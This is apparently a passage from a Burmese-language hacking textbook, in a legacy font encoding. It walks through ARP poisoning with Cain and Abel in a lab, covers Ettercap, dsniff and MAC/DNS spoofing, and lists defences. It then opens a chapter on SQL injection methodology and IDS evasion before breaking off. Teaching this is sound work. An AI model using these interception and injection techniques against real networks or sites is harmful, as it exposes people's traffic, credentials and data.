'DrSmawmh result awGudk xkwfrjyawmhbl;aemf/
 &yfwefYvdkyguvnf; Ctrl + C udk ESdyfjyD; &yfwefYEdkifygw,f/ atmufqHk;rSm
capture &vdkufwJh packet ta&twGuf pwmawGudk jrifawGYEdkifygw,f/
yxrqHk;taeeJY tcpdump (odkYr[kwf) tcpdump -vv udk toHk;jyKwJhtcg
interface tm;vHk;twGuf packet tm;vHk;udk Capture vkyfrSmjzpfygw,f/

txufygyHkuawmh tcpdump -D udkoHk;jyD; interface tm;vHk;udk

&SmazGvdkufwm jzpfygw,f/ uRefawmf ckoHk;aewJh network interface onf wifi rdkY
wlan0 jzpfygw,f/ select vkyfjyxm;ygw,f/ tJonfawmh interface tm;vHk;udk
ra&G;cs,fawmhbJ wlan0 wpfckwnf;udkyJ a&G;cs,fEdkifygw,f/ interface
a&G;cs,frSmjzpfvdkY -i udk toHk;jyKygr,f/

txufygyHktwdkif; interface udk wlan0 a&G;cs,fcJhygw,f/ (rdrdu

Ethernet oHk;&if eth0 udk a&G;cs,fEdkifygw,f/)

aemufwpfqifhtaeeJY captured packet awGudk aemuftBudrfawGrSm

jyefoHk;EdkifatmifvdkY zdkifwpfzdkiftaeeJY a&;xm;&atmif/ write command (-w) udk
oHk;vdkufygw,f/ xGufvmr,fhzdkifudk capture2.pcap vdkY ay;xm;vdkufygw,f/
uRefawmfhpufxJrSm capture.pcap qdkwJhzdkif &SdaevdkY emrnfvTJay;xm;wmyg/
rdrdESpfouf&memrnf ay;xm;Edkifygw,f/ .pcap jzpfzdkYawmh vdktyfygw,f/
aemufu greater aemufrSm&SdaewJh udef;uawmh number of bytes udk qdkvdkygw,f/

txufygtwdkif; destination (dst) host IP udk oHk;jyD;vnf;

vkyfaqmifEdkifygao;w,f/ 'Dae&mrSm uRefawmfu Host IP eJY port 22 udk toHk;jyK
jyxm;ygw,f/ tcpdump eJYywfoufjyD; man eJY help option awGudkvnf; toHk;jyK
&SmazGEdkifvdrfhr,fvdkY arQmfvifhygw,f/

Sniffing : Passive Vs Active Sniffing

Passive Sniffing udk uGefysLwmtrsm;BuD;udk hub oHk;jyD; csdwfqufxm;wJh
tajctaerSm vkyfaqmifygw,f/

jrifomatmif 'DvdkyHkpHeJY azmfjyvdkufwmyg/ network rSm&SdaewJh device

awGudk hub wpfckudk toHk;jyKyGm;,ljyD; csdwfqufxm;wJhoabmygyJ/

xdkodkY hub udk toHk;jyKcsdwfqufxm;wJhtajctaersdK;rSm Passive

Sniffing udk vkyfaqmifEdkifygw,f/ uGefysLwmonf hub wpfckwnf;ay:rSm
&SdwmaMumifh traffic tm;vHk;udk port tm;vHk;xH ay;ydkY&ygw,f/ 'DtajctaerSm
attacker tm;vHk; vkyfaqmif&rSmu sniffer awGzGifhjyD; 'D collision domain
wpfckwnf;ay:rSm&SdaewJh user wpfa,mufa,mufu data awGudk ay;ydkY^vufcH
vmr,fhtcsdefudk apmifhae&rSm jzpfygw,f/ collision domain qdkwmu one or
more data packet awG wpfckeJYwpfck collide vkyfEdkifr,fh network &JU logical area
udk qdkvdkygw,f/ collision domain xJrSm&SdwJh traffic tm;vHk;udk hub u
jrif&rSmjzpfjyD; xdktajctaerSm vkyfaqmif&wJh sniffing udk Passive Sniffing vdkY
ac:qdkygw,f/

Sniffing vkyfaaqmifEdkifapzdkYtwGuf LAN xJodkY traffic inject

vkyfaqmif&wJhtajctaersdK;udk Active Sniffing vdkY ac:qdkygw,f/ toHk;jyKwJh
enf;vrf;awGxJrSm ARP Spoofing, MAC Flooding eJY MAC Duplicating wdkY
yg0ifygw,f/ switched network xJrSm sniff jyKvkyfjcif;udkawmh Active Sniffing
vdkY owfrSwfEdkifygw,f/
Network xJrSm &SdaewJh traffic tm;vHk;udk attacker u sniff
vkyfEdkifzdkYtwGuf port awGtm;vHk;xH traffic awGudk ay;ydkYygw,f/ xdkodkYaom
switched network awGrSm ARP table onf IP address awGudk MAC address
awGeJY ,SOfwGJrSwfom;xm;ygw,f/ olwdkY&JU own ARP cache awGudkawmh
content-addressable memory (CAM) xJrSm xdef;odrf;xm;jyD;awmh b,f host
onf b,f port eJY connect vkyfw,fqdkwmudk odrf;qnf;xm;ygw,f/ 'gu
tcsdKUaom switch awGrSm vkyfavh&SdwJhyHkpHyg/ 'gayr,fh 'Dvdkvkyfaqmifjcif;u
sniffing rvkyfEdkifatmif wm;vdkY r&cJhygbl;/
xdkodkYaom switched network rsdK;xJrSm sniff vkyfEdkifr,fh enf;vrf;u
switch &JU functionality udk hub &JU vkyfaqmifyHkrsdK;tjzpf ajymif;vJypfzdkYyg/
wpfenf;ajym&&if switch &JU direct output udk broadcast method tjzpf
ajymif;oGm;atmif zefwD;zkdYyg/ 'gawGudk vkyfaqmifEdkifr,fh enf;vrf;wpfckuawmh
network udk odyfBuD;vGef;wJh frame aygif;rsm;pGmeJY flooding jzpfatmif vkyfjcif;jzifh
switch udk foil (&IyfaxG;atmif) vkyfjcif; jzpfygw,f/ xdkodkYvkyfaqmifygu
switches awGudk IP to MAC mapping rvkyfaqmifapEdkifawmhbJ broadcasting
tjzpf fail out jzpfoGm;ygw,f/
Switched Network Attacking udk OSI model layer 2 (or) layer 3 rSm
vkyfaqmifEdkifygw,f/ (aemufydkif;rSm qufaqG;aEG;oGm;rSmjzpfygw,f)
Layer 2 attack awGuawmh Switch table flooding, ARP cache
poisoning eJY MAC spoofing wdkY jzpfMujyD; layer 3 attack awGrSmawmh DNS
poisoning, source routing, advertising bogus routes, initiating ICMP redirect
message eJY rouge DHCP server using pwmawG yg0ifygw,f/

Techniques for Poisoning the Network

Attacker u source wpfckpDudk rwlnDwJh MAC awGeJY ,SOfwGJjyD; host
uae frame awGudk pwif generate vkyfwJhtcg network rSm Forwarding table
exhaustion udk jzpfay:apygw,f/ Forwarding table onf saturate jzpfoGm;ygu
aemufxyf learnng rvkyfEdkifawmhtwGuf tjcm; traffic awGudkyg flood
jzpfapygw,f/ 'Dvdkenf;eJYyJ switch onf hub &JU vkyfaqmifyHkrsdK;
ajymif;vJoGm;jyD;awmh xdk network ay:rSm &SdaewJh port awG host awGqD OD;wnfwJh
traffic tm;vHk;udk attacker u capture vkyf &,loGm;EdkifrSmjzpfygw,f/
'Dvdk attack rsdK;udk od&SdEdkifzdkYtwGufawmh switch forwarding table udk
ppfaq;jcif;tm;jzifh detect vkyfEdkifygw,f/ Macof onf xdkodkYaom attack rsdK;
vkyfaqmifEdkifapzdkYtwGuf Ethernet frame aygif; axmifaomif;csD ay;ydkYEdkifwJh tool
wpfck jzpfygw,f/

ARP protocol onf IP address awGudk NIC MAC address

awGeJY ,SOfwGJEdkifzdkY &nf&G,fygw,f/ host wpfckuae tjcm;wpfckudk ay;ydkYvdkufwJh
Traffic awGudk direct vkyf&mrSm tJonf information awGudk toHk;jyKygw,f/
 Windows cmd rSm arp -a vdkY &dkufxnfhjyD; information awGudk
Munfh&IEdkifygw,f/ arp -d udkoHk;jyD; arp cache awGudk &Sif;Eddkifygw,f/
tJvdk&Sif;wmuvnf; tcsdKUaom network issue awGudk ajyvnfapEdkifygw,f/
uRefawmfwdkY&JU Kali Linux rSmvnf;yJ arp udk toHk;jyKEdkifygw,f/

ARP spoofing qdkwm Local Area Network wpfckay:udk fake (or) spoof
vkyfxm;wJh Address Resolution Protocol (ARP) message awGudk attacker uae
zefwD;ay;ydkYwJh enf;pepfwpfck jzpfygw,f/

txufyg yHkrSmMunfh&if Attacker u A &JU IP address eJY olY&JU MAC

address udk aygif;pyfjyD; ay;ydkYwm awGY&ygr,f/ tJvdkvkyfaqmifjcif;tm;jzifh A
twGuf jyefvmwJh rnfonfh traffic udkrqdk Attacker xH a&mufvmaprSm
jzpfygw,f/ ARP spoofing rSm Attacker bmawGvkyfEdkifrvJ/
 ARP spoofing vkyfaqmifjcif;tm;jzifh attacker onf LAN ay:rSm
&SdaewJh data frame awGudk Mum;jzwf&,lwm? jyifqifwm? traffic awGudk
&yfoGm;atmifjyKvkyfwm pwmawGudk vkyfaqmifEdkifrSmjzpfygw,f/ 'Dvdk attack
rsdK;udk DoS attack, man-in-the-middle attack eJY Session hijacking attack awG&JY
tzGifhtjzpf vkyfaqmifavh&SdMuygw,f/

ARP Poisoning
ARP poisoning eJY ywfoufjyD; b,fvdkawG vkyfaqmifEdkifvJqdkwmudk
Cain and Able udk oHk;jyD; aqG;aEG;jyoGm;ay;yghr,f/

Cain and Able udk zGifhjyD; Sniffer qdkwJhae&mudk zGifh0ifvdkufyg/

taygif;yHkpHav;udk ESdyfvdkuf&ifawmh atmufygtwdkif; jrif&wwfygw,f/

yxrqHk; pwifzGifhwJhtcsdefrSm txufygtwdkif; message box udk

awGYjrif&ygr,f sniffer udk activate vkyfjyD; jzpf&r,fvdkY ajymaeygw,f/
 jrm;jyxm;wJhae&muae start Munfh&ifvnf; Warning Box om
awGY&rSmyg/

WARNING azmfjyxm;wJh message box rSm jrm;jyxm;wJh pmwef;udk

Munfhyg/ netsh int ip set global taskoffload=disable vkyfay;zdkY ajymxm;wmyg/
command prompt udk run as administrator eJY zGifhyg/ cmd xJrSm
xdkpmaMumif;av;udk &dkufxnfhjyD; enter vdkufyg/
 txufygtwddkif; jzpfoGm;wJhtcg ydwfvdkufvdkY &ygjyD/ Cain and Able
udkawmh ydwfjyD; jyefzGifhyg/ jyefyGifhvmwJhtcg cketwdkif; Sniffer udk jyef0if/
sniffing udk start vdkufyg/

pwifvdkufjyD; tcsdef cPawmh apmifh&rSmjzpfygw,f/

avmavmq,frSmawmh uRefawmfu VMware rSm Windows 7 eJY 8.1

ESpfvHk;udk oHk;xm;wJhtwGuf 'DESpfvHk;eJYyJ aqG;aEG;oGm;ygr,f/ Network xJrSm&SdwJh
pufawGudk awGYjyDjzpfvdkY sniff vkyfaewmudk &yfvdkufygr,f/ start (p) cJhwJh
ae&muaeyJ jyef stop &rSmyg/ jyD;&if Cain window atmufajcudk Munfh&atmif/

uRefawmfwdkYu ARP Poisoning vkyfrSmjzpfvdkY ARP Poison Routing

(APR) xJudk 0ifygr,f/ Hosts &JU nmbufrSm t0ga&mif t0dkif;yHkav;eJyg/ ARP
Poison Routing (APR) udk click vdkufyg/
 taygif;vu©Pmudk ESdyfjyD; uRefawmfwdkY network xJrSm &SdaewJh
pufawGudk xnfhoGif;ygr,f/

uRefawmf ck Cain and Able zGifhoHk;aewJh pufu 172.168.3.2 yg/

'gaMumifh rdrdpufr[kwfbJ apmifhMunfhr,fh pufudk a&G;cs,fyg/ uRefawmfuawmh
uGefysLwm ESpfvHk;om &SdwJh network rSmrdkY aemufwpfvHk;udk a&G;jyD; OK
vdkufygw,f/

txufyg yHkpHav;twdkif; jzpfoGm;ygjyD/

b,fbuf tay:axmifhem;u APR logo eJY Start poisoning udk

ESdyfvdkufwmeJY txufygyHkvdk Poisoning jzpfoGm;wmudk jrif&ygr,f/

uRefawmf apmifhMunfhaewJh uGefysLwm&JU Browser rSm www.google.com

udk oGm;vdkufwJhtcg vuf&Sd zGifhxm;wJh Cane and Able rSm ckvdk yHkpH rsdK;
jzpfoGm;wmudk awGYjrif&ygr,f/ google.com u oabmajymjywmyg/ b,f site
udkyJoGm;oGm; 'DvdkrsdK; vmjyrSmjzpfygw,f/
uRefawmf apmifhMunfhaewJh uGefysLwmu Browser rSm google,
Facebook, Microsoft pwJh acc awGudk 0ifa&mufvdkufygw,f/ jyD;wJhtcg
Attacking machine (Cain and Able zGifhxm;wJh machine) uae MunfhU&if
atmufygtwdkif; jrifawGY&ygr,f/

a&SUbufu IP address (172.16.3.128) onf uRefawmf apmifhMunfhaewJh

uGefysLwm&JU IP jzpfjyD;awmh aemufqHk;u IP address awGuawmh tqdkyg pufuae
oGm;a&mufxm;wJh Website awG&JU IP address awG jzpfMuygw,f/

b,fbufjcrf;rSm &SdaewJh u@awGrSm jyefMunfh&if eHab;rSm udef;awGeJY

azmfjyxm;wmawGu zrf;,l&&Sdxm;wmawGudk jyoaejyD; APR udk
yHkrSmjyxm;wJhtwdkif; a&G;vdkufwJhtcg Certificate file, SSL Server, Port eJY
Hostname qdkwmawGudk awGY&rSmjzpfygw,f/ port u 443 jzpfvdkY https udk oHk;wm
odEdkifjyD; Hostname rSmawmh oGm;a&mufvnfywfcJhwJh Website awGudk
jrif&ygw,f/ yHkrSmMunfh&ifawmh uRefawmf apmifhMunfhaewJh uGefysLwmrSm
oHk;aewm^oHk;cJhwmawGu www.google.com, accounts.google.com,
facebook.com eJY mail.live.com qdkwmawGudk awGYjrif&rSmjzpfygw,f/
 Windows 7 (Cain and Able zGifhxm;wJhpuf) & Windows 8.1
(apmifhMunfh cHae&wJh puf) tqdkyg puf 2vHk;yJ &SdaewJh network xJudk Kali Linux
uGefysLwmwpfvHk;yg csdwfqufvdkufygw,f/ (uRefawmfuawmh oHk;ckvHk;udk Virtual
Machine awGcsnf;yJ oHk;vdkufwmyg/ tjcm;pufawG r&Sdae&ifawmh VM awGeJY
prf;Edkifygw,f/)
txufyg yHkxJutwdkif;ygyJ/ Wireshark udk zGifhvdkufjyD; Apply a display
filter ae&mrSm arp vddkY xnfhvdkufygw,f/ ARP poison routing vkyfrSmrdkYyg/
jyD;awmh interface ae&mrSm uRefawmfwdkYapmifhMunfhvdkwJh vuf&Sd network interface
udk a&G;cs,f&ygr,f/ uRefawmfuawmh VM awGeJYrdkYvdkY eth0 udkyJ oHk;xm;ygw,f/
jyD;&if start vdkufvdkY &ygjyD/ atmufygtwdkif; &v'fawG jrifawGY&ygr,f/
Mac Spoofing
Mac spoofing onf puf&Hku owfrSwfay;xm;wJh Media Access
Control address (MAC address) udk ajymif;vJwJh enf;pepfwpfckvdkY
owfrSwfEdkifygw,f/ wu,fawmh MAC address qdkwm Network Interface
Controller xJrSm hard-coded jzpfwmrdkY ajymif;vJvdkY r&ygbl;/ 'gayr,fh Operating
System u NIC rSm uRefawmfwdkY ajymif;oHk;vdkufwJh Address om &Sdw,f qdkwmudk
vufcH,HkMunfoGm;atmif vkyfEdkifwJh Tool awG uRefawmfwdkYrSm &SdMuygw,f/
tJovdk MAC address masking vkyfwJh process udk MAC spoofing vdkY
ac:qdkygw,f/

DNS spoofing
olYudkawmh DNS cache poisoning vdkYvnf; ac:Muygw,f/ DNS
spoofing uawmh Domain Name System (DNS) name server's cache database
xJudk rrSefuefwJh data awGudk b,fenf;eJYrqdk introduce vkyfwJh
computer-hacking attack wpfrsdK; jzpfygw,f/ 'Dvdk vkyfaqmifjcif;tm;jzifh Name
Server onf incorrect IP address awGxH return jyefapwmrsdK;udk jzpfyGm;ap?
traffic awGudk attacker &JU uGefysLwmqD vrf;vGJa&mufoGm;ap Edkifygw,f/

Sniffing and Spoofing Tools

uRefawmfwdkY toHk;jyKjzpfcJhMuwJh Cane and Able onf ARP poison
vkyfaqmifEdkifjyD; toHk;jyK&vnf; vG,fulygw,f/ aemufxyf poisoning vkyfEdkifwJh
tool wpfckuawmh uRefawmfwdkY&JU Kali Linux rSm yg0ifwJh Ettercap jzpfygw,f/
network interface udk promiscuous mode tjzpf ajymif;vJay;jyD; target machine
awGudk ARP poisoning jyKvkyfEdkifygw,f/ man-in-the-middle attack vdkrsdK;
vkyfaqmifEdkifjyD;awmh victim awGudk attack aygif;pHkeJY wdkufcdkufEdkifygw,f/ Plugin
support vnf;ay;wmaMumifh plugin awGjznfhoGif;jyD; feature awGudk csJUxGifEdkifyg
ao;w,f/

uRefawmfwdkY&JU Kali Linux rSmawmh Ettercap eJY ettercap-graphical qdkjyD;

yHkpH ESpfrsdK;eJY yg0ifjyD;om;jzpfygw,f/ b,f[mudkzGifhzGifh twlwlygyJ/ command line
taeeJY toHk;jyKvdkYvnf; &ygw,f/ ckawmh Graphical udkyJ zGifhMunfhvdkuf&atmif/

vuf&Sd version u ettercap 0.8.2 jzpfygw,f/ 'Dpmudk zwfaewJhtcsdefrSm

version update vnf; jzpfaumif;jzpfaeEdkifygw,f/ ettercap udk zGifhMunfhr,fqdk&if
uRefawmfwdkY awGYjrif&rSmu file, Sniff, Options eJY info wdkY jzpfygw,f/

Options rSm Munfh&if Promiscuous mode udk Default twdkif; select

vkyfxm;wm awGY&ygr,f/ Unoffensive udkyg a&G;cs,fEdkifygw,f/ jyD;&ifawmh Sniff
vdkY &jyDjzpfjzpfygw,f/ Sniff rSmawmh Unified Sniffing eJY Bridged Sniffing qdkjyD;
&Sdygw,f/ Unified sniffing uawmh cable awGay:rSm jzwfoef;oGm;wJh packet
tm;vHk;udk sniff vkyfEdkifwJh enf;vrf; jzpfygw,f/ one network interface rSmom
tvkyfvkyfaqmifwmrdkYvdkY network interface ESpfckrSm aqmif&Gufvdkvsifawmh
Bridged sniffing udk toHk;jyKEdkifygw,f/
 Sniffing vkyfvdkufjyDqdk&ifawmh ettercap &JU options awG
ajymif;oGm;wmudk awGYjrif&ygr,f/

Plugins awGudkvnf; jznfhoGif;Edkif manage vkyfEdkifovdk View uaejyD;

Connection awGudk apmifhMunfhEdkifygw,f/

Targets >> Select

Target(s) uaevnf; Target awGudk
a&G;cs,fowfrSwfvdkY &ygao;w,f/ Ettercap rSm operation mode av;ckeJY
vkyfaqmifEdkifygw,f/ IP-based uawmh source eJY destination IP ay:rSm
tajccHjyD; packet awGudk filter (ppf,l) ygw,f/ MAC-based packet awGudkawmh
MAC address ay: tajccHjyD; filter vkyf,lEdkifovdk gateway wpfavQmuf &SdaewJh
connection awGudk sniffing vkyf&mrSm toHk;0ifvSygw,f/ ARP-based uawmh
host ESpfckMum;rSm ,aeYacwf toHk;rsm;wJh switched LAN rSm sniff
vkyfEdkifzdkYtwGuf ARP poisoning udk toHk;jyKygw,f (full-duplex)/ Public
ARP-based uawmh victim host wpfckuae tjcm; host tm;vHk;qD oGm;wJh
packet awGudk sniff vkyfEdkifzdkYtwGuf ARP poisoning udk toHk;jyKygw,f
(half-duplex)/
Dsniff uawmh Kali Linux rSm yg0ifjyD;o;jzpfwJh Password sniffing eJY
network traffic analysis tool awG yg0ifaygif;pyfaewJh tool wpfck jzpfygw,f/
FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP,
LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS,
X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix
ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net,
Sybase and Microsoft SQL protocols awGudk handle vkyfEdkifwJh sniffer
wpfckjzpfvdkY toHk;rsm;ygw,f/
Sniffing onf email (or) web session awGeJYom oufqdkifwmawmh
r[kwfygbl;/ Cain and Able vdk sniffer awGrSm VoIP communication
awGudkawmifrS Mum;jzwf &,lEdkifygw,f/ VoIP qdkwmu Voice over IP udk qdkvdkjyD;
network ay:uae ajymqdkqufoG,fcJhwmawG (conversations) awGudk capture
vkyfEdkifygw,f/ Caller eJY responder (zkef;ac:ol eJY jyefajzol) Mum;
ajymqdkqufoG,frIawGudk mono (or) stereo WAV file taeeJY odrf;qnf;Edkifyg
w,f/
Sniffing, ARP poisoning, MiTM eJY DNS attack awG[m xda&mufrI
&SdwJh attack awG jzpfMujyD;awmh tjrJwrf; detect vkyfzdkYqdkwm umuG,frxm;wJh
protocol awGtwGuf rvG,fulvSygbl;/ umuG,fxm;EdkifwJh protocol awGtjzpf
Telnet tpm; SSH udk oHk;EdkifjyD;awmh HTTP tpm; HTTPs pwJh protected
protocol awGudk ajymif;vJoHk;&ygr,f/ internet ay: wdkuf&dkuf public vkyfEdkifwJh
system awGudk allow rvkyfxm;&ygbl;/ network xJrSm &SdaewJh device
wdkif;twGuf VPN udk toHk;jyKumuG,fxm;oifhygw,f/ Application awGtaeeJY
Xarp wdkY ARPwatch wdkYudk toHk;jyKumuG,fxm;oifhygw,f/ jzpfEdkifr,fqdk&ifawmh
uRefawmfwdkY&JU vkyfief;cGifrSm IDS or IPS hardware awGudk toHk;jyKjyD;
umuG,fxm;oifhygw,f/ IPSec awG xm;&Sdvkyfaqmifjcif;tm;jzifhvnf; hacker
awG sniffing vkyfvdkY &&SdoGm;r,fh a'wmawGudk toHk;jyKvdkYr&atmif
umuG,fxm;Edkifygw,f/
 aemufydkif;xGufwJh switch awGrSmawmh security feature awG rsm;pGm
yg0ifvmygw,f/ port security u port wpfckcsif;pDtwGuf MAC address awGudk
uefYowfxm;EdkifzdkY ulnDygvdrfhr,f/ attack awG BuHKvmwJhtcgrSmvnf; xdk port udk
shutdown jyKvkyfEdkifrSm jzpfygw,f/
XARP onf Free and Commercial qdkjyD; ESpfrsdK; xGuf&Sdygw,f/
www.xarp.net rSm &,lEdkifygw,f/

tqdkyg attack rsdK; BuHKcJhygu apmifhMunfhcH&wJh uGefysLwmrSm tckvdk

owday;csufawG awGU&rSmjzpfygw,f/ toHk;jyKwJh switch router awGudkvnf;
aumif;rGefpGm configure vkyfxm;zdkY vdktyfrSmjzpfygw,f/ uRefawmfwdkYtaeeJY
Sniffing eJY ywfoufjyD; tm;vHk; tjynfhtpHkaqG;aEG;zdkYqdkwmawmh pmtkyfwpftkyf
oD;oefY zwfrS &rSmjzpfvdkY 'Davmufav;eJYyJ &yfem;yg&apcifAsm/ aemufxyf
CHAPTER wpfckrSm jyefqHkawGY&atmifyg/
CHAPTER 22: SQL Injection

Introduction

uRefawmfwdkYawG Budrfzefrsm;pGm awGYjrifaeus pum;vHk;wpfcku SQL

Injection jzpfygvdrfhr,f/ Browser wpfck &Sdae&HkeJY rnfonfh OS rSmrqdk
(uGefysLwmrSmjzpfap? zkef;rSmjzpfap) vkyfaqmifEdkifwmaMumifhvnf; oHk;&wmtqif
ajywJh Attack wpfrsdK;jzpfwJh SQL injection onf toHk;jyKrI rsm;wJh Common
attack trsdK;tpm;wpfckvnf; jzpfygw,f/
rnfonfh vHkjcHKa&; csdK;azmufrIrSmrqdk t"dutaeeJY sensitive
information awGeJY access awGudk w&m;r0ifenf;vrf;eJY &,lzdkYudk OD;wnfMuavh
&Sdygw,f/ 'Dtcef;rSmawmh SQL injection eJY ywfoufjyD; tawmfrsm;rsm;udk
aqG;aEG;oGm;ygr,f/ Sensitive information awGu bmawGvJqdkawmh Social
security number awG? Credit card tcsuftvufawG? aiGaMu;qdkif&m
tcsuftvufawG eJY user ID & password awG pwmawG jzpfMuygw,f/ SQL
injection wpfck atmifjrifoGm;jyDqdk&ifawmh Attacker taeeJY victim &JU Database
rSm &SdaewJh Data awGudk cdk;,lwmrsdK;? tcsuftvufawG ajymif;vJjyifqifwm
(alter & change)? topfawGzefwD;wmrsdK;? zsufqD;wmawGrsdK; vkyfaqmif
Edkifygw,f/ Web application wpfckrSm SQL vulnerability &SdaejyDqdk&ifawmh
'gonf SQL injection eJY wkdufcdkufcH&EdkifzdkY tcGifhtvrf; rsm;aejyDvdkY qdk&rSmyg/
SQL server qDrSwpfqifh cGifhjyKrxm;wJh unauthorized access awGudk
&,lEdkifzdkYeJY database information awGudk &SmazG jyef,lvmEdkifapzdkYtwGuf attacker
awGonf SQL command awGudk submit jyKvkyfMuygw,f/ SQL vulnerability
onf Web Developer &JU tm;enf;csufaMumifh jzpfay:jcif;jzpfjyD; SQL server &JU
tm;enf;csuf r[kwfyg/ Web Developer &JU trSwfwrJh trSm;rsdK;? odvsufeJY wrif
vkyfxm;wJh trSm;rsdK;? ruRrf;usifrIaMumifh jzpfay:wJh trSm;rsdK; pwmawGuae
SQL vulnerability jzpfay:ygw,f/
SQL &JU tjynfhtpHku Structured Query Language jzpfjyD; database eJY
qufoG,faqmif&Guf (communicate) &mrSm toHk;jyKygw,f/ SQL onf
relational database management system twGuf standard language wpfck
vdkYvnf; qdkEdkifygw,f/ SQL Injection onf Code injection technique
wpfrsdK;jzpfwmaMumifh olYudk toHk;jyKEdkifzdkYtwGuf uRefawmfwdkYtaeeJY odrSwfxm;
p&mawG &Sdaeygw,f/
SQL injection vkyfaqmifzdkYtwGuf Hacker awG oHk;avh&SdwJh Character
awG &Sdygw,f/ tenf;i,fudk azmfjy&&ifawmh single line eJY multi-line comments
awGeJY OR vdkrsdK; string indicator awG? concatenation character awG?
wildcard/asterisk parameter awG? URL parameter awG? local & global variable
awG? time delay awG pwmawGudk toHk;jyKMuygw,f/
SQL Injection rSm 1. First Order Attack, 2. Second Order Attack eJY 3.
Lateral Injection Attack qdkjyD; t"du Attack type oHk;rsdK; awGY&ygw,f/
Programmer wpfa,muftaeeJY ajym&&ifawmh uRsefawmfwdkY&JU program awGudk
pwifvkyfaqmifpOfumvawGuwnf;u 'D Character awGeJYywfoufjyD; BudKwif
jyifqifajz&Sif;xm;zdkY vdktyfygw,f/ Attacker awonf authentication
mechanism awGeJYywfoufjyD; aumif;rGefpGm enf;vnfxm;Muygw,f/ 'gaMumifh
user authentication udk ausmfjzwf (Bypass) EdkifzdkYtwGuf y&d,m,f<u,f0wJh
a&SmifvTJjcif; enf;ynm (sophisticated evasion techniques) awGudk toHk;jyKMuavh
&Sdygw,f/
'ghjyif Attacker awGonf hex coding udkvnf; toHk;jyKMuygao;w,f/
tcsdKUaom Website awGrSm Munfh&if URL awGxJrSm %20 awGudk
awGYjrif&ygvdrfhr,f/ 'g[m hex coding ygyJ/ %20 onf Space udk qdkvdkygw,f/
Alphanumeric character vdkYac:wJh pmom;eJYudef; a&maewJh character trsm;pk
onf hex coding udk toHk;jyKygw,f/ 'gayr,fh Intrusion detection system
vdkYac:wJh usL;ausmf0ifa&mufjcif;udk umuG,fwJh pepfawGonf hex coding udk
odjrifEdkifpGrf; r&SdMuygbl;/ 'gaMumifh 'Dtm;enf;csufudk toHk;csjyD; attacker awGu
tJonf hex coding awGudk toHk;jyKjyD; Attack awGudk vkyfaqmifMuygw,f/
,aeY toHk;jyKaeMuwJh signature-based SQL injection detection
engine awGrSmawmh malicious SQL code awGxJu white space encoding awGeJY
udef;*Pef;ajymif;vJjcif;wdkYvdkY attack rsdK;awGudk od&SdaeEdkifMuygw,f/ odkYaomfvnf;
tJonfvdk uk'fawGeJY white space awGudkawmh ajz&Sif;ay;EdkifpGrf; r&SdMuao;ygbl;/
'ghjyif space rygwJh tjcm;aom pmom;awGudkvnf;yJ rod&SdEdkifMuao;ygbl;/
Attacker awGonf yHkrSeftm;jzifhawmh query awGxJuae white space awGudk
z,fxkwfypfMuavh&SdMuygw,f/
SQL statement awG&JU execution vkyfEdkifrIudk ajymif;vJapjcif;r&SdbJ
SQL keyword awGeJY string (number) awGMum;rSm white space awGudk
xyfjznfhpGufjcif;tm;jzifh umuG,fa&;pepfawGudk &IyfaxG;jyD; Za0Z0gjzpfatmif
(obfuscate) vkyfaqmifMuygw,f/ Tab, carriage return/ linefeed, pwJh special
character awGudk toHk;jyKjyD; white space awGudk xnfhoGif;r,fqdk&if execute
jzpfapr,fh statement vnf; rysufapbJeJY detection system awGudk
vSnfhpm;EdkifrSmjzpfygw,f/
SQL Injection Methodology
SQL injection wpfck vkyfaqmifEdkifzdkYtwGuf attacker taeeJY vdkufem
vkyfaqmif&r,fh pattern av;wpfck &Sdygw,f/ 'gudk Methodology vdkY ac:vdkY
&ygw,f/
yxrqHk;taeeJY SQL injection rpwifrD Attacker twGuf vdktyfwJh
information awGudk pkaqmif;xm;&ygr,f/ SQL vulnerability awG&Sdae&if
odEdkifatmifvkyf&ygr,f/ Vulnerability &Sdaewmudk odoGm;jyDqdk&ifawmh Attack
pwifvkyfaqmifEdkifjyD jzpfygw,f/ authentication tm;enf;ygvsifawmh network
xJudk 0ifa&mufEdkifapr,fh main source tjzpf toHk;cs0ifa&mufEdkifrSm jzpfygw,f/
aemufwpfqifhtaeeJY malicious code awGudk xnfhoGif; (inject)
vkyfEdkifzdkYtwGuf authentication rule awGudk exploit vkyfrSm jzpfygw,f/
tJonftqifh jyD;jyDqdk&ifawmh privilege user tjzpf network access awGudk
&,loHk;pGJEdkifzdkYtwGuf data awGudk extract (jznf) &rSmjzpfygw,f/ 'gawGtjyif
Operating System udk ydkjyD; xdef;csKyfvkyfaqmifEdkifapzdkYtwGuf privilege access
awGudk ydkjyD; us,fjyefYvmatmif (escalate) vkyfaqmifygao;w,f/
tJovdk vkyfaqmifEdkifjyDqdk&ifawmh privilege user account awG? tjcm;
acc opfawGudk zefwD;EdkifvmrSmjzpfovdk &SdESifhjyD;om; account awGudkvnf;
jyifqifwm zsufypfwmawGudk vkyfEdkifoGm;rSmjzpfygw,f/ 'grSr[kwf Trojan (or)
Malware awGudkawmifrS install EdkifoGm;rSmjzpfygw,f/
SQL vulnerability awGudk &SmazGwJhae&mrSmawmh website ay:rSm
&SdaewJh input field awG? hidden field awGeJY post request awGudk OD;pGm
pm&if;vkyfxm;Edkifygw,f/ jyD;&ifawmh error wpfckckudk xkwfazmfEdkifzdkYtwGuf code
awGudk input field xJodkY inject vkyfEdkifrSmjzpffygw,f/ tJovdk vkyfaqmifwJh
ae&mrSm error-based SQL injection, union-based SQL injection, blind SQL
injection attack pwJh attack awGudk vkyfaqmifMuygw,f/ atmifjrifoGm;jyD
qdk&ifawmh table names, column name eJY target database qDrS table data awGudk
jznfxkwfEdkifzdkY BudK;pm;Edkifygw,f/ oabmw&m;awG odyfrsm;aevdkY ysif;aejyD
xifygw,f/ uJ vufawGYav; vkyf&if; aygif;pyfMunfh&atmif/

Finding Vulnerable Websites

yxrqHk;taeeJY SQL vulnerability &SdaewJh website awGudk 'Dwdkif;
&SmazG Munfh&atmif/ uRefawmf 'Da&SUrSm aqG;aEG;cJhwJhxJrSm SQL injection qdkwm
developer &JU csdKU,Gif;csuf wpfckckaMumifh jzpfay:w,f qdkwm azmfjycJhjyD;
jzpfygw,f/ SQL vulnerable key words awGrsm;pGm &Sdygw,f/ xdkxJu
